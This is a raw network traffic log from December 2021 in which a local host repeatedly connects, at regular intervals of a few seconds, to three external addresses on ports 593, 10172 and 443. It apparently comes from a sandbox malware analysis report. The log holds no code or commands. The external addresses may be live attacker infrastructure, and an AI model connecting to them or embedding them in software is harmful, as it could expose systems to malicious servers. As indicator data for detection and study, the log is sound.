Dec 31, 2021 09:53:37.037235022 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.228291035 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.232074022 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.232229948 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.232248068 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.700356960 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.700409889 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.702750921 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.702809095 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.703972101 CET	49885	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:37.820406914 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.849394083 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:37.849539995 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.850294113 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.879148960 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:37.879416943 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:37.879508018 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.880434990 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.886640072 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.886756897 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:37.899012089 CET	593	49885	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:37.915448904 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:37.915487051 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:37.953366041 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:38.027820110 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:38.027863026 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:38.028141022 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:38.031435966 CET	49888	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:38.060261011 CET	10172	49888	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:38.143063068 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.143153906 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:38.143325090 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.144824028 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.144869089 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:38.695178032 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:38.695262909 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.695835114 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.695848942 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:38.699434996 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.699456930 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:38.699522018 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:38.699532986 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:39.494379997 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:39.494435072 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:39.496675014 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:39.499264002 CET	49889	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:39.499294996 CET	443	49889	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:39.719726086 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:39.928778887 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:39.929128885 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:39.929929972 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.138658047 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.139005899 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.139197111 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.139736891 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.143762112 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.143873930 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.348757029 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.352772951 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.352791071 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.818895102 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.818917036 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:40.819031000 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.821999073 CET	49890	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:40.937900066 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:40.966625929 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:40.966732025 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:40.968818903 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:40.997339964 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:40.997642994 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:40.997728109 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:40.998159885 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.000756025 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.000864029 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.029361010 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.029407978 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.030647993 CET	593	49890	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:41.068988085 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.141263008 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.141308069 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.141355991 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.141400099 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.143666029 CET	49891	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:41.172290087 CET	10172	49891	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:41.251207113 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.251247883 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:41.251342058 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.252183914 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.252201080 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:41.834187031 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:41.834342003 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.835149050 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.835166931 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:41.842354059 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.842392921 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:41.842466116 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:41.842473984 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:42.662247896 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:42.662379026 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:42.662549973 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:42.664781094 CET	49892	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:42.664828062 CET	443	49892	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:42.824742079 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.015104055 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.015348911 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.016752005 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.206885099 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.207109928 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.207191944 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.208009958 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.213587999 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.213808060 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.398224115 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.403928041 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.403958082 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.405121088 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.405150890 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.870023012 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.870069027 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:43.870162010 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.873400927 CET	49899	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:43.989053011 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.018106937 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.018316031 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.019481897 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.048419952 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.048763037 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.048883915 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.049645901 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.056551933 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.056720018 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.063446045 CET	593	49899	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:44.085669041 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.085690975 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.085699081 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.197171926 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.197195053 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.197341919 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.197391033 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.199315071 CET	49902	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:44.228260040 CET	10172	49902	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:44.313637972 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.313692093 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:44.313837051 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.314340115 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.314372063 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:44.929481983 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:44.929553986 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.930073977 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.930083990 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:44.933701038 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.933717966 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:44.933825970 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:44.933834076 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:45.775607109 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:45.775754929 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:45.775968075 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:45.783464909 CET	49904	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:45.783507109 CET	443	49904	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:45.939224005 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.126810074 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.127005100 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.128185034 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.315732002 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.315825939 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.315948963 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.316747904 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.323523045 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.323736906 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.504039049 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.510833979 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.510950089 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.510978937 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.511219025 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.976229906 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.976274967 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:46.976306915 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.976351023 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:46.978691101 CET	49906	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:47.094427109 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.123616934 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.123733997 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.124463081 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.153615952 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.153784990 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.153856039 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.155057907 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.159548998 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.159698009 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.165874958 CET	593	49906	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:47.188694954 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.188740015 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.188766956 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.299520969 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.299560070 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.300147057 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.303172112 CET	49907	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:47.332238913 CET	10172	49907	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:47.422677040 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.422719955 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:47.422938108 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.423610926 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.423636913 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:47.990122080 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:47.993915081 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.994471073 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.994488001 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:47.998051882 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.998063087 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:47.998728037 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:47.998752117 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:48.800810099 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:48.800877094 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:48.800982952 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:48.801009893 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:48.804105043 CET	49908	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:48.804119110 CET	443	49908	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:48.924491882 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.128726959 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.128906965 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.129617929 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.333645105 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.333897114 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.334042072 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.334680080 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.339816093 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.340045929 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:49.538954973 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.543992996 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.544037104 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:49.544064045 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:50.009076118 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:50.009123087 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:50.009224892 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:50.009279013 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:50.011437893 CET	49909	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:50.127125025 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.156488895 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.156621933 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.157504082 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.186728954 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.186897993 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.186975002 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.187438965 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.190715075 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.190813065 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.215467930 CET	593	49909	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:50.220094919 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.220124006 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.220148087 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.331773996 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.331816912 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.331923962 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.334335089 CET	49910	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:50.363502026 CET	10172	49910	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:50.453994989 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:50.454054117 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:50.454200029 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:50.454758883 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:50.454787970 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.014475107 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.014676094 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.015623093 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.015642881 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.024218082 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.024234056 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.024483919 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.024514914 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.832950115 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.833142042 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.833182096 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.833230972 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.840123892 CET	49911	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:51.840168953 CET	443	49911	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:51.956371069 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.140387058 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.140583992 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.141381025 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.325170040 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.325454950 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.325623989 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.326248884 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.329452991 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.329556942 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.509957075 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.513328075 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.513346910 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.513545036 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.979135036 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.979165077 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:52.979265928 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:52.982605934 CET	49912	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:53.096623898 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.125426054 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.125560999 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.126312017 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.154819012 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.154954910 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.155024052 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.156125069 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.160733938 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.160845041 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.166764975 CET	593	49912	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:53.189366102 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.189388037 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.189397097 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.301157951 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.301211119 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.301311016 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.301352024 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.304656982 CET	49913	10172	192.168.2.7	46.101.175.170
Dec 31, 2021 09:53:53.333515882 CET	10172	49913	46.101.175.170	192.168.2.7
Dec 31, 2021 09:53:53.424508095 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:53.424583912 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:53.424710989 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:53.425386906 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:53.425415039 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.057924032 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.058034897 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.058695078 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.058710098 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.064286947 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.064301014 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.064414978 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.064430952 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.918252945 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.918344975 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:54.918395996 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.918430090 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.922239065 CET	49914	443	192.168.2.7	103.9.36.172
Dec 31, 2021 09:53:54.922260046 CET	443	49914	103.9.36.172	192.168.2.7
Dec 31, 2021 09:53:55.067632914 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.243448973 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:55.243791103 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.244645119 CET	49915	593	192.168.2.7	103.70.29.126
Dec 31, 2021 09:53:55.418988943 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:55.419413090 CET	593	49915	103.70.29.126	192.168.2.7
Dec 31, 2021 09:53:55.419574022 CET	49915	593	192.168.2.7	103.70.29.126
